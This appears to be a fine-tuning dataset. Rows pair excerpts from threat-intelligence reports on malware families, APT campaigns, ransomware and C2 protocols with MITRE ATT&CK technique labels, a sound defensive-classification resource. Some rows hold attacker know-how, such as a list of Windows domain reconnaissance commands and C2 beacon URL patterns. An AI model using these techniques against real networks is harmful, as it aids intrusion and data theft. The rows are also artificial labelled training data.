| 336 | At first glance, these links generally cause less suspicion for the targets. After opening the links and several redirections, the victims are led to final phishing domains such as “mobile[.]recover-session-service[.]site” etc | ['T1583.001 - Domains'] | fine_tune |
| 337 | On July 18, 2018, one day after the AZORult update above was announced, we observed a campaign delivering thousands of messages targeting North America that used the new version of AZORult. The messages used employment-related subjects such as “About a role” and “Job Application”. The attached documents used file names in the format of “firstname.surname_resume.doc | ['T1140 - Deobfuscate/Decode Files or Information'] | fine_tune |
| 338 | The final payload created by the aforementioned process is a well known backdoor, also known as ROKRAT by Cisco Talos. One of its main functions is to steal information. Upon execution, this malware creates 10 random directory paths and uses them for a specially designated purpose | ['T1083 - File and Directory Discovery'] | fine_tune |
| 339 | The executables installed by the compiled AutoIt scripts is a backdoor that Molerats has used in many attack campaigns. Based on our research, the Spark backdoor has been used by Molerats since at least early 2017, as it was the main payload in the Operation Parliament campaign reported by Kaspersky | ['T1218.007 - Signed Binary Proxy Execution: Msiexec'] | fine_tune |
| 340 | To obtain the session ID and pre-shared key, the payload will issue a query to resolve the following domain: mail. random number between 100000 and 999999>.<c2 name> This request notifies the C2 server that the payload is about to send system specific data as part of the initial handshake | ['T1016 - System Network Configuration Discovery'] | fine_tune |
| 341 | Numbered Panda has a long list of high-profile victims and is known by a number of names including: DYNCALC, IXESHE, JOY RAT, APT-12, etc. Numbered Panda has targeted a variety of victims including but not limited to media outlets, high-tech companies, and multiple governments. Numbered Panda has targeted organizations in time-sensitive operations such as the Fukushima Reactor Incident of 2011, likely filling intelligence gaps in the ground cleanup/mitigation operations. One of the most interesting techniques that Numbered Panda likes to use is to dynamically calculate the Command and Control (C2) port by resolving a DNS. The malware will typically use two DNS names for communication: one is used for command and control; the other is used with an algorithm to calculate the port to communicate to. There are several variations of the algorithm used to calculate the C2 port, but one of the most common is to multiply the first two octets of the IP address and add the third octet to that value. Numbered Panda will frequently use blogs or WordPress in the c2 infrastructure, which helps to make the network traffic look more legitimate. CrowdStrike has observed Numbered Panda targeting high-tech, defense contractors, media organizations, and western governments. Disclosure of this information went through the same IGL process as discussed in the Whois Anchor Panda blog post | ['T1102.002 - Bidirectional Communication'] | fine_tune |
| 342 | To perform this task, the developer used the GDI API: A keylogger is also present in the analyzed sample. The SetWindowsHookEx() API is used to retrieve the stroked keys. The GetKeyNameText() API is used to retrieve a string that represents the name of a key. In addition to the key, the title of the foreground window is stored in order to known where the infected user is typing (by using the GetForegroundWindow() and GetWindowText() API | ['T1010 - Application Window Discovery'] | fine_tune |
| 343 | Key Points PrivateLoader is a downloader malware family that was first identified in early 2021 The loader’s primary purpose is to download and execute additional malware as part of a pay-per-install (PPI) malware distribution service PrivateLoader is used by multiple threat actors to distribute ransomware, information stealers, banking t | ['T1105 - Ingress Tool Transfer'] | fine_tune |
| 344 | AT&T Alien Labs has discovered new malicious files distributed by the threat actor TeamTNT. The use of open-source tools like Lazagne allows TeamTNT to stay below the radar for a while, making it more difficult for anti-virus companies to detect | ['T1082 - System Information Discovery', 'T1049 - System Network Connections Discovery'] | fine_tune |
| 345 | It also creates a pipe for inter-process communication (IPC) by calling the pipe() function for getting two file descriptors for reading and writing data. It also enables non-blocking I/O for the writing file descriptor by using ioctl | ['T1559 - Inter-Process Communication'] | fine_tune |
| 346 | The threat actor abused the stolen credentials to create rogue, high-privileged domain user accounts which they then used to take malicious action. By creating these accounts, they ensured they would maintain access between different waves of the attack. Once the threat actor regains their foothold, they already have access to a high-privileged domain user account | ['T1078 - Valid Accounts', 'T1136.002 - Create Account: Domain Account'] | fine_tune |
| 347 | Since September of 2018, Redaman banking malware has been distributed through malspam. These emails have file attachments. These file attachments are archived Windows executable files disguised as a PDF document. In September 2018, the attachments were zip archives. In October 2018, the attachments were zip archives, 7-zip archives, and rar archives. In November 2018, the attachments were rar archives. And in December 2018, the attachments changed to gzip archives with file names ending in .gz | ['T1027 - Obfuscated Files or Information', 'T1566.001 - Phishing: Spearphishing Attachment', 'T1036 - Masquerading'] | fine_tune |
| 348 | Volexity has worked with multiple victim organizations to assist with incident response efforts and to remedy their compromised systems. This process lead to the identification of different ways the OceanLotus group gains access to the compromised websites and how they maintain access | ['T1505.003 - Server Software Component: Web Shell'] | fine_tune |
| 349 | Anomali Labs has detected a new campaign by the threat group Rocke. In this campaign, the group has changed from using a Python-based malware to a malware written in Golang. The detection of this new malware is nearly non-existent. In addition, the group uses a private mining pool to reduce the risks of being detected | ['T1059.006 - Command and Scripting Interpreter: Python'] | fine_tune |
| 350 | Winnti Linux variant’s core functionality is within ‘libxselinux’. Upon execution, an embedded configuration is decoded from the data section using a simple XOR cipher. An example Python function to decode this configuration is shown below | ['T1027 - Obfuscated Files or Information', 'T1140 - Deobfuscate/Decode Files or Information'] | fine_tune |
| 351 | Lazarus Group is one of the most sophisticated North Korean APTs that has been active since 2009. The group is responsible for many high profile attacks in the past and has gained worldwide attention. The Malwarebytes Threat Intelligence team is actively monitoring its activities and was able to spot a new campaign on Jan 18th 2022 | ['T1105 - Ingress Tool Transfer'] | fine_tune |
| 352 | The payload is an application that creates a hidden window (the name of the class and the window is SK_Parasite | ['T1564.003 - Hide Artifacts: Hidden Window'] | fine_tune |
| 353 | kaudited — A file installed as /usr/bin/kaudited. This binary will drop and install several loadable kernel modules (LKMs) on the infected machine. To ensure that the infected machine won’t crash due to the kernel-mode rootkits, it uses different modules for specific kernel versions. The kaudited binary also drops a watchdog component that will monitor the cryptocurrency miner file and process | ['T1105 - Ingress Tool Transfer'] | fine_tune |
| 354 | These credentials are used in a credential stuffing or password spraying attack against the victim’s remote services, such as webmail or other internet reachable mail services. After obtaining a valid account, they use this account to access the victim’s VPN, Citrix or another remote service that allows access to the network of the victim. Information regarding these remotes services is taken from the mailbox, cloud drive, or other cloud resources accessible by the compromised account. As soon as they have a foothold on a system (also known as patient zero or index case), they check the permissions of the account on that system, and attempt to obtain a list of accounts with administrator privileges. With this list of administrator-accounts, the adversary performs another password spraying attack until a valid admin account is compromised. With this valid admin account, a Cobalt Strike beacon is loaded into memory of patient zero. From here on the adversary stops using the victim’s remote service to access the victim’s network, and starts using the Cobalt Strike beacon for remote access and command and control | ['T1078.002 - Domain Accounts'] | fine_tune |
| 355 | TIN WOODLAWNTIN WOODLAWN is a targeted threat group, active since at least 2014, that CTU researchers assess with moderate confidence is operated or tasked by the Vietnamese government. TIN WOODLAWN is technically capable and uses a range of techniques including template injection, obfuscated macros and steganography for malware delivery, memory-resident malware, use of native command line scripts for Cobalt Strike persistence, and non-standard command and control channels such as DNS and ICMP.ToolsTaegis™ XDR Adversary Software Coverage Tool | ['T1059.001 - Command and Scripting Interpreter: PowerShell'] | fine_tune |
| 356 | As mentioned in our earlier technical report on Trojan.Hydraq, the back door allows the attacker to perform any of the following activities: - Adjust token privileges. Create, modify, and delete registry subkeys. Retrieve a list of logical drives. Uninstall itself by deleting the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RaS[FOUR RANDOM CHARACTERS] subkey | ['T1012 - Query Registry'] | fine_tune |
| 357 | Hancitor, a loader that provides Malware as a Service, has been observed distributing malware such as FickerStealer | ['T1566.001 - Phishing: Spearphishing Attachment'] | fine_tune |
| 358 | The third campaign deployed a different custom RPC backdoor to that used in the second campaign. This backdoor used code derived from the publicly available PowerShellRunner tool to execute PowerShell scripts without using powershell.exe. Prior to execution, the PowerShell scripts were stored Base64-encoded in the registry | ['T1059.003 - Command and Scripting Interpreter: Windows Command Shell'] | fine_tune |
| 359 | A typical response from the C2 server is a legitimate-looking webpage containing the string “!DOCTYPE html”, which the malware checks. The malware then locates a Base64-encoded blob, which it decodes and proceeds to load as a shellcode | ['T1140 - Deobfuscate/Decode Files or Information'] | fine_tune |
| 360 | One of the Cobalt 2.0 Group’s latest campaigns, an attack that leads to a Cobalt Strike beacon and to JavaScript backdoor, was investigated and presented by the Talos research team. Morphisec has investigated different samples from the same campaign. The following analysis presents our findings, focusing on the additional sophistication patterns and attribution patterns | ['T1059.007 - Command and Scripting Interpreter: JavaScript'] | fine_tune |
| 361 | The malware will collect data from the victim machine and write this information to LOCALAPPDATA%\MicroSoft Updatea\uplog.tmp. The following information is collected from the victim | ['T1074.001 - Data Staged: Local Data Staging'] | fine_tune |
| 362 | Like most ransomware, Sodinokibi encrypts files and adds a random extension such as “test.jpg.1cd8t9ahd5” (Data Encrypted for Impact, ATT&CK T1486). It also drops a ransom note in folders that contain encrypted files. The name of the ransom note is the random extension added to the encrypted files. For example, if the extension is ".1cd8t9ahd5", the ransom message filename will be called "1cd8t9ahd5-HOW-TO-DECRYPT.txt | ['T1486 - Data Encrypted for Impact'] | fine_tune |
| 363 | The DUBNIUM samples are distributed in various ways, one instance was using a zero-day exploit that targets Adobe Flash, in December 2015 | ['T1203 - Exploitation for Client Execution'] | fine_tune |
| 364 | The payload decryption routine uses a custom symmetric algorithm based on arithmetic and byte-shift instructions – a combination of SHL/SHR/SUB/ADD/XOR – with hardcoded keys | ['T1140 - Deobfuscate/Decode Files or Information'] | fine_tune |
| 365 | This recent APT10 activity has included both traditional spear phishing and access to victim’s networks through service providers. For more information on infection via service providers see M-Trends 2016). APT10 spear phishes have been relatively unsophisticated, leveraging .lnk files within archives, files with double extensions (e.g. Redacted]_Group_Meeting_Document_20170222_doc_.exe) and in some cases simply identically named decoy documents and malicious launchers within the same archive | ['T1204.002 - User Execution: Malicious File'] | fine_tune |
| 366 | Malicious web shell activity as observed in the Cybereason solution. Commands executed via a modified version of the China Chopper web shell | ['T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1505.003 - Server Software Component: Web Shell'] | fine_tune |
| 367 | This campaign is different from prior activity because a new dropper was observed being used by Rocke that is written in Go (Golang) instead of Python. The detection for the malware on VirusTotal (VT) is nearly non-existent. Figure 1, below, shows the detections for the most recent sample submitted to VT. It can be seen that only one engine successfully detected it as malicious | ['T1057 - Process Discovery'] | fine_tune |
| 368 | On June 12, QakBot continued its evolution. The delivery method of a .ZIP file to malicious .VBS was the same, but this time QakBot also dropped a Zloader payload on its victim. Beginning around 14:24 UTC, Falcon Complete observed QakBot threat actors using a new .VBS payload | ['T1059.005 - Command and Scripting Interpreter: Visual Basic'] | fine_tune |
| 369 | While the decoy in Figure 2 is displayed, the macro will search the document for the delimiter ###$$$ and write the base64 encoded text that follows this delimiter to the file %APPDATA%\Base.txt. OopsIE Trojan Analysis The OopsIE Trojan delivered in these attacks is packed with SmartAssembly and further obfuscated with ConfuserEx v1.0.0. By using the InternetExplorer application object, all C2 related requests will look as if they came from the legitimate browser and therefore will not contain any anomalous fields within the request, such as custom User-Agents. As seen in the above request, the Trojan will generate a URL for its beacon with the following structure: http://<c2 domain>/chk. hex(Environment.UserName/Environment.MachineName)> The Trojan will issue a request to this URL to check (hence the chk string in the URL) to see if the C2 server has a command for the Trojan to run. The C2 server will respond to the Trojan’s request by echoing the value <hex(Environment.UserName/Environment.MachineName)> if it wishes to provide additional commands. If the C2 server does not respond with the appropriate echoed data, the Trojan will create a file named srvCheckresponded.tmp in the SpecialFolder.CommonApplicationData folder and write nothing to it before exiting. If the C2 server provides the appropriate echoed data in the response, the Trojan attempts to determine what commands the C2 wishes to run by issuing a request to the following URL: http://<c2 domain>/what. hex(Environment.UserName/Environment.MachineName)> After issuing the what command, the Trojan will parse the C2's response for the string Oops, which the Trojan will treat as the C2 making a mistake and will exit | ['T1041 - Exfiltration Over C2 Channel'] | fine_tune |
| 370 | Replying to @ESETresearchAttackers replaced win_fw.dll, an internal component that is executed during IDA Pro installation, with a malicious DLL. The malicious win_fw.dll creates a Windows scheduled task that starts a second malicious component, idahelper.dll, from the IDA plugins folder | ['T1036.004 - Masquerading: Masquerade Task or Service', 'T1574.002 - Hijack Execution Flow: DLL Side-Loading'] | fine_tune |
| 371 | The maldocs used in this campaign typically contain a malicious VBA macro that downloads and activates the next stage of the infection chain. Although the VBA macro contains an auto open subroutine, it uses several VBA functions registered to trigger if the "Typing replaces selection" property is enabled in Microsoft Word. Appdata%\desktop.iniThe next stage of the VBS is run using wscript.exe using a command such as:%windir%\System32\wscript.exe //e:vbscript //b <path_to_Stage_2>Macros dropping VBS to disk and running via wscript.exe | ['T1140 - Deobfuscate/Decode Files or Information'] | fine_tune |
| 372 | The injection function is responsible for resolving all the required API calls. It then opens a handle to the target process by using the OpenProcess API. It uses the SizeOfImage field in the NT header of the DLL to be injected into allocated space into the target process along with a separate space for the init_dll function. The purpose of the init_dll function is to initialize the injected DLL and then pass the control flow to the entry point of the DLL. One thing to note here is a simple CreateRemoteThread method is used to start a thread inside the target process unlike the KernelCallbackTable technique used in our macro | ['T1104 - Multi-Stage Channels'] | fine_tune |
| 373 | SDBbot is a new remote access Trojan (RAT) written in C++ that has been delivered by the Get2 downloader in recent TA505 campaigns. Its name is derived from the debugging log file (sdb.log.txt) and DLL name (BotDLL[.]dll) used in the initial analyzed sample. SDBbot is composed of three pieces: an installer, a loader, and a RAT component | ['T1055.001 - Process Injection: Dynamic-link Library Injection', 'T1105 - Ingress Tool Transfer'] | fine_tune |
| 374 | This would save them the trouble of needing to load additional malware to exfiltrate files or other material. We are aware of no evidence of follow-up interactions between the operators and successful victims as part of any extortion attempts. Furthermore, Stealth Falcon’s use of JavaScript to profile and de-anonymize victims seems inconsistent with a primary motivation of collecting information that could be used for blackmail | ['T1005 - Data from Local System'] | fine_tune |
| 375 | Siloscape mimics CExecSvc.exe privileges by impersonating its main thread and then calls NtSetInformationSymbolicLink on a newly created symbolic link to break out of the container | ['T1134.001 - Access Token Manipulation: Token Impersonation/Theft'] | fine_tune |
| 376 | One unique and fairly recent variant is a plain downloader that follows a similar convention to the aforementioned MarkiRAT implants. It also leverages MFC and embeds its logic within a CDialog class, getting executed upon initiation of an MFC dialog object during runtime. The use of this sample diverges from those used by the group in the past, where the payload was dropped by the malware itself, suggesting that the group might be in the process of changing some of its TTPs | ['T1071.001 - Application Layer Protocol: Web Protocols'] | fine_tune |
| 377 | The implementation details of Seaduke also have some similarities to WellMess, as both use encrypted cookies to transfer metadata about the data being sent and use obfuscated base64 data in HTTP requests as the contents of communications. These techniques are not unique to Blue Kitsune but provide an interesting correlation between the WellMess backdoor and Blue Kitsune tools used since 2015 | ['T1071.001 - Application Layer Protocol: Web Protocols'] | fine_tune |
| 378 | 1) The group delivers a malicious Office lure document to victims, most likely via a spear-phishing email. 2) These lure documents use titles with government, military, and diplomatic themes, and the file names are written in English or Cyrillic languages. These documents are not very sophisticated, but evidence of infections shows that they’re effective | ['T1566.001 - Phishing: Spearphishing Attachment'] | fine_tune |
| 379 | In past attacks, the Ragnar Locker group has used exploits of managed service providers or attacks on Windows Remote Desktop Protocol (RDP) connections to gain a foothold on targeted networks | ['T1569.002 - System Services: Service Execution', 'T1543.003 - Create or Modify System Process: Windows Service'] | fine_tune |
| 380 | DOMAIN} nltest /domain_trusts /all_trusts net share route print netstat -nao net localgroup qwinsta WMI Query ROOT\CIMV2:Win32_BIOS WMI Query ROOT\CIMV2:Win32_DiskDrive WMI Query ROOT\CIMV2:Win32_PhysicalMemory WMI Query ROOT\CIMV2:Win32_Product WMI Query ROOT\CIMV2:Win32_PnPEntity - whoami /all - arp -a - ipconfig /all - net view /all - cmd /c set - - nltest /domain_trusts /all_trusts - net share - route print - netstat -nao - net localgroup - qwinsta - WMI Query ROOT\CIMV2:Win32_BIOS - WMI Query ROOT\CIMV2:Win32_DiskDrive - WMI Query ROOT\CIMV2:Win32_PhysicalMemory - WMI Query ROOT\CIMV2:Win32_Product - WMI Query ROOT\CIMV2:Win32_PnPEntity | ['T1047 - Windows Management Instrumentation'] | fine_tune |
| 381 | Once gaining the initial foothold into a container, Hildegard establishes either a tmate session or an IRC channel back to the C2. It is unclear how TeamTNT chooses and tasks between these two C2 channels, as both can serve the same purpose. Unit 42 researchers have not observed any commands in the IRC channel. However, the IRC server's metadata indicates that the server was deployed on Jan | ['T1071 - Application Layer Protocol'] | fine_tune |
| 382 | Grants system privileges via Windows services - Uses DLL sideloading technique to evade security solutions - Starts and injects code to a new svchost process to prevent tracking | ['T1543.003 - Create or Modify System Process: Windows Service', 'T1055 - Process Injection'] | fine_tune |
| 383 | This component overwrites the master boot record (MBR) of an infected host with a malicious 16-bit bootloader with a SHA256 hash of | ['T1561.002 - Disk Structure Wipe'] | fine_tune |
| 384 | Analysis of BRONZE BUTLER's operations, targeting, and capability led CTU researchers to assess that it is likely that the group is located in the PRC. The group has used spearphishing, strategic web compromises (SWCs), and an exploit of a zero-day vulnerability to compromise targeted systems. After exfiltrating targeted data from a network, BRONZE BUTLER typically deletes evidence of its activities. However, it maintains access to compromised environments when possible, periodically revisiting compromised sites to identify new opportunities for data exfiltration | ['T1087.002 - Account Discovery: Domain Account'] | fine_tune |
| 385 | Also, the PlugX that Mustang Panda APT uses has some extra features, including spreading through USB, gathering information, and stealing documents in air-gaped networks via USB | ['T1560.003 - Archive via Custom Method', 'T1074.001 - Data Staged: Local Data Staging'] | fine_tune |
| 386 | The following commands were used to create and add the DefaultUser account to the local Administrators group, and subsequently hide the account from the Windows logon screen | ['T1087.001 - Account Discovery: Local Account', 'T1098 - Account Manipulation', 'T1136.001 - Create Account: Local Account', 'T1564.002 - Hide Artifacts: Hidden Users'] | fine_tune |
| 387 | At this point the C2 sends a JSON with commands to execute, including uploading/downloading files, taking a screenshot and finding *.rar archives on the host | ['T1041 - Exfiltration Over C2 Channel'] | fine_tune |
| 388 | The captured sample used in this analysis is an MSI file named “view-(AVISO)2020.msi” that is spread through a ZIP archive, just as with the previous variant. In the previous analysis, I showed that this MSI file is parsed and executed automatically by MsiExec.exe when a user double clicks on it in Windows OS | ['T1218.007 - Signed Binary Proxy Execution: Msiexec'] | fine_tune |
| 389 | After gaining an initial foothold on a compromised system, the NICKEL actors routinely performed reconnaissance on the network, working to gain access to additional accounts or higher-value systems. NICKEL typically deployed a keylogger to capture credentials from users on compromised systems | ['T1070 - Indicator Removal on Host', 'T1114.002 - Email Collection: Remote Email Collection'] | fine_tune |
| 390 | In 2011, while still at McAfee, he went on to reveal Comment Crew (which he calls Comment Panda) operating alongside Elderwood. It's called that because the group so often uses a technique involving internal software "comment" features on web pages as a tool to infiltrate target computers | ['T1189 - Drive-by Compromise'] | fine_tune |
| 391 | The threat actor initially conducts system reconnaissance to assess the AV software installed and the user privilege | ['T1518.001 - Software Discovery: Security Software Discovery'] | fine_tune |
| 392 | We observed the threat group upload a second stage malware, known as BUBBLEWRAP (also known as Backdoor.APT.FakeWinHTTPHelper) to their Dropbox account along with the following command | ['T1049 - System Network Connections Discovery', 'T1069.001 - Permission Groups Discovery: Local Groups'] | fine_tune |
| 393 | Finally, it deletes Shadow Volume Copies and prevent the victim from using Shadow Volumes to recover their encrypted files | ['T1047 - Windows Management Instrumentation', 'T1490 - Inhibit System Recovery'] | fine_tune |
| 394 | Deriving C2 URLs from a Domain Generation Algorithm (DGA) using lists of domain names, subdomains, top-level domains (TLDs), Uniform Resource Identifiers (URIs), file names, and file extensions | ['T1568.002 - Domain Generation Algorithms'] | fine_tune |
| 395 | These fake updates are served via legitimate websites that have been compromised, and use social engineering to trick users into downloading and running a malicious executable. These fake update campaigns appear to be a pay-per-install service that is simply used by INDRIK SPIDER to deliver its malware, as other malware has also been delivered via the same campaigns | ['T1105 - Ingress Tool Transfer'] | fine_tune |
| 396 | Although the developers attempt to use a denylist of files and directories to skip, it was observed encrypting core Windows operating system files, which caused the operating system to become unstable and crash. This was observed when running the ransomware on a Windows 2012 machine | ['T1486 - Data Encrypted for Impact'] | fine_tune |
| 397 | In a new sample of the REvil ransomware discovered by MalwareHunterTeam, a new -smode command-line argument was added that forces the computer to reboot into Safe Mode before encrypting a device | ['T1562.009 - Impair Defenses: Safe Boot Mode'] | fine_tune |
| 398 | The BackConfig custom trojan has a flexible plug-in architecture for components offering various features, including the ability to gather system and keylog information and to upload and execute additional payloads | ['T1105 - Ingress Tool Transfer', 'T1082 - System Information Discovery'] | fine_tune |
| 399 | Since then, the threat actors have expanded delivery to include malicious spam campaigns, RDP attacks, and other attack vectors. In other reports, threat actors breached at least three managed service providers (MSPs) and used the access to deploy REvil to the MSPs' customers | ['T1566 - Phishing'] | fine_tune |
| 400 | The following diagram illustrates the changes applied to targeted executables after infection has taken place and how these components interact on execution | ['T1091 - Replication Through Removable Media'] | fine_tune |
| 401 | Basic system enumeration – The script collects the Windows OS version, computer name, and the contents of a file Ni.txt in $APPDATA path; the file is presumably created and filled by different modules that will be downloaded by the main module | ['T1082 - System Information Discovery'] | fine_tune |
| 402 | Starting with a simple scan, the first information that the malware can collect is related to files with the following extensions: .docx, .xlsx, .pdf, .pptx, .rar, .zip, .jpg, .bmp, .tiff. For each file found on the disk, it retrieves the full path and the last modified date of the file. That information is encrypted using the AES key mentioned earlier and stored in the file 0.txt. Another scan targets the extensions .dat, .json, .db and like the previous scan it retrieves the full path and last modified date of the file. Then it encrypts them and it stores it under the file 57.txt | ['T1119 - Automated Collection'] | fine_tune |
| 403 | Reports system hardware and software configuration. This built-in utility is a command line version of the System Information.app (/Applications/Utilities/System Information.app) and is a mainstay of all types of malware, spyware, post-exploitation tools, adware, and PUPs. Because of its deep insight into the entire environment, it can be used for a variety of purposes relating to environment discovery, detection evasion and anti-analysis | ['T1082 - System Information Discovery'] | fine_tune |
| 404 | As seen in the above screenshot, there is a large overlap in unique strings in both samples. The original sample involved in the forbes.com breach used HTTP, which is consistent with the original variant discussed in this blog post. It should be noted that while the newest variant that uses direct network communication over port 22 no longer uses HTTP, references to the HTTP strings are still found within the sample itself. This is most likely due to code re-used by the attackers | ['T1140 - Deobfuscate/Decode Files or Information'] | fine_tune |
| 405 | In late July 2021, we identified an ongoing spear phishing campaign pushing Konni Rat to target Russia. Konni was first observed in the wild in 2014 and has been potentially linked to the North Korean APT group named APT37 | ['T1566.001 - Phishing: Spearphishing Attachment'] | fine_tune |
| 406 | The orchestrator is the main component of the Carbon framework. It is mainly used to inject code into a process that communicates legitimately over the Internet and to dispatch the tasks received from the injected library to other computers on the same network either through named pipes or TCP | ['T1055.001 - Process Injection: Dynamic-link Library Injection'] | fine_tune |
| 407 | The HTTP variant checks if Kaspersky is installed on the victim’s machine by searching for the existence of files in the Kaspersky installation folder | ['T1518.001 - Software Discovery: Security Software Discovery'] | fine_tune |
| 408 | The Zebrocy Trojan gathers system specific information that it will send to the C2 server via an HTTP POST request to the above URL. Like other Zebrocy samples, this Trojan collects system specific information it will send to the C2 server by running the command SYSTEMINFO & TASKLIST on the command line and by enumerating information about connected storage devices. This specific variant of Zebrocy will also send a screenshot of the victim host as a JPEG image to the C2 server | ['T1113 - Screen Capture', 'T1057 - Process Discovery', 'T1120 - Peripheral Device Discovery', 'T1082 - System Information Discovery'] | fine_tune |
| 409 | PowerShower, named and previously disclosed by Palo Alto Networks in their blogspot (see above), is a malicious piece of PowerShell designed to receive PowerShell and VBS modules to execute on the local computer. This malware has been used since October 2018 by Cloud Atlas as a validator and now as a second stage | ['T1218.005 - Signed Binary Proxy Execution: Mshta'] | fine_tune |
| 410 | We observed a number of phishing emails that reference an invoice, as seen in Figure 1. The attachment in these emails is a weaponized Microsoft Office document containing a malicious macro that – when enabled – leads to the download of Hancitor | ['T1566.001 - Phishing: Spearphishing Attachment'] | fine_tune |
| 411 | These are later used by the attackers to send targeted emails to the victims, with the obtained information being used to lure victims into opening those emails | ['T1135 - Network Share Discovery'] | fine_tune |
| 412 | The trojanized update file is a standard Windows Installer Patch file that includes compressed resources associated with the update, including the trojanized SolarWinds.Orion.Core.BusinessLayer.dll component | ['T1036.005 - Masquerading: Match Legitimate Name or Location'] | fine_tune |
| 413 | Cisco Talos has observed another malware campaign that utilizes malicious Microsoft Office documents (maldocs) to spread the remote access trojan (RAT) ObliqueRAT. ObliqueRAT has been linked to the Transparent Tribe APT group in the past | ['T1566.001 - Phishing: Spearphishing Attachment', 'T1566.002 - Phishing: Spearphishing Link'] | fine_tune |
| 414 | Xbash is a novel and complex Linux malware and the newest work of an active cybercrime group. From its characteristics and behaviors, we could realize many trends in current IoT/Linux security battleground | ['T1053.003 - Scheduled Task/Job: Cron'] | fine_tune |
| 415 | Once we deobfuscated it, we found that the script contained a large array of hard coded domain names, with one of them being randomly selected and used for subsequent DNS queries. It is important to note that while the Powershell scripts for stages 3 and 4 contain two arrays of domains, the first array is only used if a failure condition is reached while the sample is using the second array. Figure 8: Stage 3 Domain List The 'logic' function present within this Powershell script randomly selects a C2 domain from the second array in the script and uses this domain to perform an initial lookup. If the result of the initial DNS TXT record request is empty or in the case the lookup fails, the 'do_lookup' function is then called and randomly selects a domain from the first array in the script. Interestingly, the domains used by the 'do_lookup' function did not appear to have active 'www' or 'mail' TXT records. The script also uses specific subdomains which are combined with the domains and used for the initial DNS TXT record queries performed by the malware. The malware uses the contents of the TXT record in the response to these queries to determine what action to take next. For instance, the first subdomain is 'www' and a query response with a TXT record containing 'www' will instruct the script to proceed. The response to this DNS request results in the transmission of the fourth stage malware, stored within the TXT record as displayed in Figures 10 and 11. Due to the size of the Stage 4 payload, DNS makes use of TCP for this transaction | ['T1071.004 - Application Layer Protocol: DNS'] | fine_tune |
| 416 | It writes a file using two data structures: one associated with the file and other used for reading data from the C&C | ['T1070 - Indicator Removal on Host'] | fine_tune |
| 417 | The only way to ensure that deleted files, as well as files that you encrypt with EFS, are safe from recovery is to use a secure delete application. Secure delete applications overwrite a deleted file's on-disk data using techniques that are shown to make disk data unrecoverable, even using recovery technology that can read patterns in magnetic media that reveal weakly deleted files. SDelete (Secure Delete) is such an application. Note that SDelete securely deletes file data, but not file names located in free disk space | ['T1070.004 - Indicator Removal on Host: File Deletion', 'T1485 - Data Destruction'] | fine_tune |
| 418 | Download and execution of ntbscan (SHA-1: 90da10004c8f6fafdaa2cf18922670a745564f45) – NetBIOS scanner tool widely used by multiple APT actor including the prolific Chinese group APT10 - Execution of Windows built-in networking utility tools - Access to the victim’s files, especially documents located on the Desktop | ['T1083 - File and Directory Discovery'] | fine_tune |
| 419 | Executive summary . The PROMETHIUM threat actor — active since 2012 — has been exposed multiple times over the past several years.. However, this has not deterred this actor from continuing and expanding their activities. The group has at least four new trojanized setup files we observed: Firefox (a browser), VPNpro (a VPN client), DriverPack (a pack of drivers) and 5kPlayer (a media player). How did it work. Talos could not pinpoint the initial attack vector, however, the use of trojanized installation files to well-known applications is consistent with the previously documented campaigns. The trojanized setup will install the malware and the legitimate application, which is a good way to disguise its activities. PROMETHIUM has been resilient over the years. We have no evidence that the websites of the real applications were compromised to host the malicious installer. We can conclude that the PROMETHIUM threat actor is interested in new countries or the malicious framework developed by this threat actor is exported in more countries than previously thought. The usage of the HKCU\Software\Microsoft\Windows\CurrentVersion\Run registry key has a persistence mechanism that has been replaced by the creation of a service. The malicious service: rmaserv.exe . This binary has two main features. Conclusion . The PROMETHIUM threat actor is dedicated and resilient, exposing them hasn't refrained them from moving forward with their agenda | ['T1036.005 - Masquerading: Match Legitimate Name or Location'] | fine_tune |
| 420 | As part of Reflective DLL loading the malware performs the following tasks on the DLL it has unwrapped in memory: Copy the unwrapped DLL into new locations in its own memory space. Build imports required by the DLL (based on the IAT of the DLL) - Copy the unwrapped DLL into new locations in its own memory space. Build imports required by the DLL (based on the IAT of the DLL | ['T1055.001 - Process Injection: Dynamic-link Library Injection'] | fine_tune |
| 421 | 4) Special attention was given to the design of the network communication, in order to reduce the noise a large number of encrypted machines may generate while contacting the Command and Control servers. 5) The encryption scheme is solid – using the AES and RSA algorithms | ['T1573.002 - Asymmetric Cryptography', 'T1486 - Data Encrypted for Impact'] | fine_tune |
| 422 | The tool was primarily used by the attackers to move laterally on the victim’s network. PowerShell: Microsoft scripting tool that was used to run commands to download payloads, traverse compromised networks, and carry out reconnaissance. WinSCP: Open source FTP client used to exfiltrate data from targeted organizations | ['T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol'] | fine_tune |
| 423 | While investigating the domains and infrastructure used by the phishing components of Gorgon Group, Unit 42 researchers witnessed several common operational security flaws with Gorgon Group's actors throughout their many campaigns. It was one of these OPSEC failures that gave us an interesting cross-section of malware Gorgon Group is using. Included in the directories were a combination of files leveraged in targeted attacks mentioned above against nation states. Additionally, there was a plethora of malware samples that were criminal in nature | ['T1106 - Native API'] | fine_tune |
| 424 | Both variants of ServHelper use the same HTTP C&C protocol on port 443 (HTTPS) and, less frequently, port 80 (HTTP). An example of the initial phone home to the C&C server is shown in Figure 5 | ['T1071.001 - Application Layer Protocol: Web Protocols'] | fine_tune |
| 425 | IcedID’s operators probably plan on targeting businesses because they added a network propagation module to the malware from the get-go. IcedID possesses the ability to move to other endpoints, and X-Force researchers also observed it infecting terminal servers | ['T1087.003 - Email Account'] | fine_tune |
| 426 | Reaver proceeds to write a shortcut file to ‘%TEMP%\~WUpdate.lnk’. This file is then copied to a filename of ‘Windows Update.lnk’, which is placed in the startup path previously identified. This shortcut file points to the path of the previously written ‘Applet.cpl’ file. Finally, Reaver.v1 will execute the ‘~WUpdate.lnk’ file in a new process, thus loading the recently dropped malicious CPL file. In the event this is successful, the malware will use the following path to store any dropped files | ['T1218.002 - Signed Binary Proxy Execution: Control Panel'] | fine_tune |
| 427 | The attackers used the Windows Management Instrumentation Command Line Utility (wmic.exe) to execute commands on remote computers, such as adding a new user or executing additional downloaded PowerShell scripts. Cobalt Strike was also used to carry out credential dumping using ProcDump and to empty log files | ['T1136 - Create Account', 'T1047 - Windows Management Instrumentation', 'T1070.001 - Indicator Removal on Host: Clear Windows Event Logs', 'T1003.001 - OS Credential Dumping: LSASS Memory'] | fine_tune |
